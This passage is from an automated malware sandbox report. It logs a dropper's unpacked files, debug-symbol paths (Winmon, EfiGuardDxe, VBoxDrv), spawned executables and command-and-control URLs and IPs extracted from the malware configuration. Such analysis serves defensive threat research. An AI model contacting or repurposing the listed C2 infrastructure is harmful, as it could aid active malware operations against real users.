                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeUnpacked PE file: 22.2.syncUpd.exe.400000.0.unpack
                    Source: C:\Users\user\Pictures\N82pZRBoHBOB1dfNMGUFcUyF.exeUnpacked PE file: 35.2.N82pZRBoHBOB1dfNMGUFcUyF.exe.400000.7.unpack
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085307048.log
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085338724.log
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085318383.log
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312085332766.log
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Loader.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: EfiGuardDxe.pdb7 source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.0000000000391000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000391000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000CD1000.00000040.00000001.01000000.00000024.sdmp
                    Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: `K_lib.dll.pdb@+ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: symsrv.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000C7A000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003599000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .exe.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb@+ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp
                    Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: `K_lib.dll.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Unable to locate the .pdb file in this location source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: The module signature does not match with .pdb signature. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .pdb.dbg source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: '(EfiGuardDxe.pdbx source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: symsrv.pdbGCTL source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000C7A000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003599000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: or you do not have access permission to the .pdb location. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: EfiGuardDxe.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .exe.pdb@ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb@ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.0000000000391000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000391000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000CD1000.00000040.00000001.01000000.00000024.sdmp
                    Source: Binary string: dbghelp.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: dbghelp.pdbGCTL source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00452A60 FindFirstFileA,GetLastError,15_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,15_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,15_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,15_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00462750 FindFirstFileA,FindNextFileA,FindClose,15_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpCode function: 15_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,15_2_00463CDC
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeCode function: 21_2_00408123 FindFirstFileA,FindClose,21_2_00408123
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeCode function: 21_2_004085B8 DeleteFileA,DeleteFileA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,21_2_004085B8
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeCode function: 21_2_0040342B FindFirstFileA,21_2_0040342B
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
                    Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://185.172.128.145/3cd2b41cbde8fc9c.php
                    Source: Malware configuration extractorURLs: ddtwcxy.info
                    Source: Malware configuration extractorURLs: http://185.172.128.145/3cd2b41cbde8fc9c.php
                    Source: Malware configuration extractorURLs: http://trad-einmyus.com/index.php
                    Source: Malware configuration extractorURLs: http://tradein-myus.com/index.php
                    Source: Malware configuration extractorURLs: http://trade-inmyus.com/index.php
                    Creates HTML files with .exe extension (expired dropper behavior)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 3uFEiJxNvXDLSx4uJaa7wat0.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: H7KGXQ6dBPsGtVyaRmBBH4ZJ.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: uUsTsPesltkS6XkccPV4r1be.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: xdeUkahxXV0peWYvEuaoQ5lY.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: wpKptbv32NVp981jR7IpS2TU.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: kSJXiyS21Fr6loSHePxOV5vj.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: wT1m3cYdySIZCFNyNz1LtiDI.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: ALltRFSkkUvPiwDCHOWNnJTU.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: vzEeLze12RaA0DTINh80KVLb.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: CoOFUlBTAxdcXlCbNuzkOL16.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: ehmaglN0xR0nHQUkgEyuJf0y.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: MiUHKxXX51Qbx03CZluTi3J9.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: KvVhvgPSZVVuQ2V4ZRuAm6wU.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: ZSwgvRB1MVwrU7ijKh97GNss.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: X9JjhOnMjDRUE1fVTg3wLaen.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 0Wr1nNnwPmwWrctj4jhBOWiY.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 5uaGL394o1URo4OLi5h5u5tB.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: CibrY0jABY8XCRw2yGSnSNFY.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: xBkTzUdEhVpjUVzIbl9rLudD.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: uBxBptf5NobXMRbp9XweSTtU.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 2d6KuM4aSdo4Om5tzqdiW7Zo.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: QJMqOYNChgpluCS4J0FQbc2K.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: aSvR4wbbpHKmaflFz1ztlj53.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: PAakmJj1W2pAPqUYFVVZPpc3.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: tEoXnSB5a2gG0aMGbYjuRHfY.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: JP80FrmljPdGuglWd6iTjokO.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Kf4hiHPq92VEGie04P7QtHUU.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: crYUqUfDLkZVNCAux0aW23Dz.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: wX1CP74iAAUoTFJQYBTP9Zvu.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: g2LMCi9zXGxk0I4KoquGjNoW.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: LfQ6AcJl79u70uyUOmZMpsO7.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: BFIPe0JcRTJoY0eD7LTQloQp.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: kvcXJdAWmGUbr8hmaELuyUx9.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: D0tt9Bi4QCVn6gSIHYzURaoe.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 84uXgYSh2YRu2JRIl1mBIrr0.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: szxnVM7joyiHfYU34zqEUXkf.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: SlQp2iXUORWSKN8efo65IezR.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: r8gqu0cQM4cFZpLLYNqE3orY.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: GgkHyxCAI1v6YgxGdG6aBohl.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: GAjlRiAb894FTNSLdHcssDg7.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: cmnshDDu9usrWvW5qWukljAj.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: uhBVT5V3lDslDlt8tqNtlrAY.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: gVtsjBmwbG1RqNOK7dMp2zOk.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 134QwGZJHw0tmuZYxwi52Diq.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: Ohi8pXexVO8QgJzedGYgQpLP.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: oDkca1eYy4fuopCBdAoYb2ih.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: qx9m66oAULRc7jSInMlGf6NE.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: JSGiefluj5wDg9apxUoKpz5k.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: nUwn1YHZ6ZbqJMYsLSEECV7Y.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: vM1uCPFSWXKxJxL2erpSUwze.exe.4.dr
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: 7Kp576NDAvTzMJEKhm2Q0W0Q.exe.4.dr
